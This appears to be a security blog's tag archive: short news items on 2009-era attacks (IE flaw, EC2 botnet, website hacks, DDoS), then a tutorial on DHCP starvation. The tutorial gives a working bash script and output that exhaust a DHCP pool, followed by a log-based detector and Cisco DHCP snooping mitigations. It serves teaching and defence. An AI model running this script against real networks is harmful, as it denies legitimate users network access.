Tag Archives: attack

Security flaw in IE used to target U.S. firms in cyber attack

Filed under Security News
Microsoft announced yesterday that the cyber criminals who launched a large-scale assault on network security at multiple American firms did so via a vulnerability in the company's Internet Explorer browser software.

A security alert released by the company said that IE 6 installations running on some less commonly used versions of Windows were vulnerable, as well as IE 6, 7, and 8 installations on Windows XP, Vista, Server 2003/2008, and Windows 7. Microsoft has said that it is working on a solution and could release an off-cycle update to repair the vulnerability.

CNET reports that source code was stolen from over 30 U.S. firms targeted in the attack, including Adobe, Yahoo, Symantec, and Dow Chemical, though only Adobe has issued an official confirmation that it was attacked.

Experts say that setting IE's security features to maximum prevents the attack from gaining access to valuable personal or company data. According to PC Magazine, this implies the exploit targets IE's unprivileged context, outside of which it is unlikely to cause many problems.

Amazon cloud services attacked by zombie computers

Filed under Security News
The popular EC2 cloud hosting service operated by Amazon suffered a botnet attack last week, and it was revealed that the service was unwittingly playing host to a command-and-control unit for the malicious software.

A botnet formed by the infamous Zeus Trojan was found to have infected some of EC2's client sites, and spread to others through the cloud service provider. This resulted in several service outages last week, as it unfortunately coincided with power failures at an Amazon facility in northern Virginia.

Amazon told CNET that "When we find misuse, we take action quickly and shut it down...which we did in this case. Our terms of usage are clear and we continually monitor and work to make sure the services aren't used for illegal activity. We also take the privacy of our customers very seriously, and don't inspect their instances."

EC2 offers the type of highly customizable - and more importantly, scalable - cloud hosting solutions that proponents of the cloud model say will revolutionize the IT world. However, the controversy over security and reliability will only be fanned by last week's events.

Hacker attack forces shutdown of Michael Savage website

Filed under Security News
The website of controversial radio talk show host Michael Savage was forced to shut down for an hour on Saturday after a hacker infiltrated the site, according to WorldNetDaily.

WorldNetDaily reported that the hacker had broken in through a feedback portal and "damaged" the site. Savage, who has been placed on a list of banned people in the UK for spreading hatred, blamed Britain for the hack on his website.

Savage has been critical of the UK over the recent release of the convicted bomber of the flight over Lockerbie, Scotland, Abdelbaset Ali al-Megrahi, who has since returned to his native Libya.

"Why on the day of the worldwide furor over the release of the Lockerbie bomber by [British Prime Minister] Gordon Brown would Michael Savage's website be hacked?" Savage said, according to WorldNetDaily. "We cannot say who did this, but would it not be a possibility that the Brits themselves ordered this hack attack?"

Political hackers often use methods like a SQL injection attack to infiltrate web servers and post digital graffiti on websites.

Earlier this month, hackers broke into the websites of several members of the U.S. House of Representatives, replacing portions of their home pages with digital graffiti, according to the Washington Post Security Fix blog.

Trojan used in DDoS attacks programmed to self-destruct

Filed under Security News
Trojan malware that was responsible for a series of cyberattacks on websites in the U.S. and South Korea last week was programmed by the attackers to erase the hard drives of the infected PCs used to launch distributed denial-of-service (DDoS) attacks, a web security researcher said.

Joe Stewart, director of malware research at SecureWorks, said the cyberattackers programmed the malware to download a program that overwrites the data on the hard drive with a message that reads "memory of the independence day," followed by as many "u" characters as it takes to write over the drive, the Washington Post's Security Fix blog reported.

The DDoS attacks, which began on July 4 and hit sensitive sites including the South Korean defense ministry and the U.S. Secret Service, disrupted government and commercial websites in at least three separate waves.

South Korean officials said Friday that the attacks used 86 IP addresses in 16 countries, including South Korea, the U.S. and Japan, but not North Korea, according to the Associated Press.

However, members of the South Korean parliament's intelligence committee told media Wednesday that the country's National Intelligence Service told them it believes North Korea or its sympathizers were responsible.

Twitter used for DDOS attacks on Iranian sites

Filed under Security News
Tech-savvy Iranians have been using social networking sites such as Twitter and YouTube to transmit information about protests against that country's ruling regime since a disputed election on Friday.

But web security researchers say Twitter is now being used to launch distributed denial-of-service attacks on Iranian websites.

Richard Stiennon, founder of a Michigan-based IT security consultancy, said Twitter has been used recently to launch DDOS attacks on URLs inside Iran, including government sites of security forces.

Stiennon has spotted Twitter messages with embedded links that allow users to launch a DDOS simply by clicking on the URL in the message, he told Computerworld.com.

Some commentators are cautioning that participating in the cyberattacks could end up backfiring and hurting Iranian dissidents.

Evgeny Morozov, a fellow at the Open Society Institute, blogged at the net.effect website of Foreign Policy magazine that the DDOS attacks could overwhelm Iran's networks, leaving the protesters without any communication with the outside world.

Everyone, it seems, is rushing to join the web-based support for Iranian protesters. Google announced that it had added Farsi to its translation service to help Farsi-speakers communicate to people in other languages and vice versa.

Spammers are also jumping on the bandwagon. Researchers spotted Twitter spam that includes keywords connected to the Iranian crisis to attract more attention, PC World reported.

DHCP starvation – quick and dirty

Filed under Articles

Overview


The DHCP starvation attack is quite simple to implement and therefore quite dangerous. It can be used to mount a denial of service attack in the local network, preventing legitimate clients from accessing network resources. In this article we will demonstrate how this attack can be deployed, and later we will go through the steps necessary to mitigate it on Cisco equipment.


Scenario


The idea behind DHCP starvation is to obtain dummy leases for all IPs in the DHCP range. This effectively causes a DoS: new network clients that request an IP address from the DHCP server will not be served, as there are no free IP addresses left to lease. Depending on the lease time configured on the DHCP server, the effect of the attack lasts as long as it takes for the leases to expire.

This attack can be automatically performed with yersinia, but for demonstration purposes we will use a quick and dirty script that only uses macchanger and dhclient.

macchanger is a great tool that does just what its name says – it changes the MAC address of your network interface. dhclient, on the other hand, is the standard tool present in almost any Linux distribution for leasing an IP address from a DHCP server and renewing the lease when necessary.

To the point – the following bash script demonstrates step by step how such an attack works:

root@bt:~# cat starve.sh
#!/bin/bash

while true; do
   # kill all running dhcp clients - just in case
   killall dhclient
   rm -f /var/run/dhclient.pid

   # bring down the interface
   ifconfig eth0 down

   # change the MAC address of the interface and print the new MAC address
   macchanger -a eth0 2>&1 | grep Faked

   # bring the interface up
   ifconfig eth0 up

   # make a new DHCP lease
   dhclient eth0 2>&1 | grep DHCPACK
done
root@bt:~#

The results from running this script, besides causing a DoS attack (for which you will be personally responsible unless you are authorized to perform penetration testing of the network resources involved), will look much like this:

root@bt:~# ./starve.sh
dhclient: no process killed
Faked MAC:   00:0e:7b:63:fc:18 (Toshiba)
DHCPACK of 192.168.123.207 from 192.168.123.1
Faked MAC:   00:30:63:ec:24:fb (Santera Systems, Inc.)
DHCPACK of 192.168.123.208 from 192.168.123.1
Faked MAC:   00:0b:30:df:69:28 (Beijing Gongye Science & Technology Co.,ltd)
Faked MAC:   00:0d:08:d3:d9:ad (Abovecable, Inc.)
Faked MAC:   00:05:20:49:1f:5a (Smartronix, Inc.)^C
root@bt:~#

When you stop seeing DHCPACKs, this means that you have depleted the available leases of the DHCP server.
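From the defender's side, the output above has a recognisable signature: a burst of DHCPACKs to many different MAC addresses within a short time. The following Python script, an added example that is not part of the original article, detects that pattern in DHCP server syslog lines; the ISC dhcpd log format it parses and the sample lines it feeds itself are assumptions constructed for the example.

```python
import re
from collections import deque
from datetime import datetime

# Matches an ISC dhcpd syslog ACK line (format assumed for this example), e.g.
# "Jul  4 10:15:01 dhcp dhcpd: DHCPACK on 192.168.123.207 to 00:0e:7b:63:fc:18 via eth0"
ACK_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ dhcpd(?:\[\d+\])?: "
    r"DHCPACK on (?P<ip>\d+\.\d+\.\d+\.\d+) to (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
)

def parse_ack(line, year=2009):
    """Return (timestamp, ip, mac) for a DHCPACK line, None for any other line."""
    m = ACK_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["ip"], m["mac"]

def detect_starvation(lines, window_s=60, mac_threshold=20):
    """Alert whenever at least mac_threshold distinct client MACs were ACKed within
    window_s seconds. A host renewing its own lease repeatedly counts only once."""
    window = deque()     # (timestamp, mac) of ACKs inside the window
    in_window = {}       # mac -> number of ACKs still inside the window
    alerts = []
    for line in lines:
        rec = parse_ack(line)
        if rec is None:
            continue
        ts, _ip, mac = rec
        window.append((ts, mac))
        in_window[mac] = in_window.get(mac, 0) + 1
        while (ts - window[0][0]).total_seconds() > window_s:   # evict old ACKs
            _old_ts, old_mac = window.popleft()
            in_window[old_mac] -= 1
            if in_window[old_mac] == 0:
                del in_window[old_mac]
        if len(in_window) >= mac_threshold:
            alerts.append((ts, len(in_window)))
    return alerts

def make_sample():
    """Constructed log: three ordinary leases over 40 minutes, then 25 ACKs to 25
    different MACs within 25 seconds, the signature left by a starvation script."""
    normal = [f"Jul  4 09:{m:02d}:00 dhcp dhcpd: DHCPACK on 192.168.123.{10 + i} "
              f"to 00:11:22:33:44:{i:02x} via eth0" for i, m in enumerate((0, 20, 40))]
    burst = [f"Jul  4 10:15:{s:02d} dhcp dhcpd: DHCPACK on 192.168.123.{200 + s} "
             f"to 00:0e:7b:63:fc:{s:02x} via eth0" for s in range(25)]
    return normal + burst
```

The window and threshold must be tuned to the size of the pool and the normal lease churn of the segment; on a small pool the threshold should be well below the number of free addresses so the alert fires before the pool is exhausted.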


Mitigation


When IP addresses are allocated through DHCP servers, DHCP snooping can be configured on the switches so that only clients with specific IP/MAC addresses are allowed access to the network.

To enable DHCP snooping on a Cisco IOS switch, use the following commands (placeholders in angle brackets are to be replaced with your own values):

! Enable DHCP snooping globally:
switch(config)# ip dhcp snooping
! Enable DHCP snooping for specific VLANs:
switch(config)# ip dhcp snooping vlan <vlan-id>[,<vlan-id>]
! In interface configuration mode, mark the interface facing the DHCP server (or the uplink) as trusted, which allows DHCP replies to pass; all other interfaces stay untrusted:
switch(config-if)# ip dhcp snooping trust
! In interface configuration mode, set a rate limit for DHCP packets on an untrusted port; this is what throttles the flood of requests a starvation script generates:
switch(config-if)# ip dhcp snooping limit rate <packets-per-second>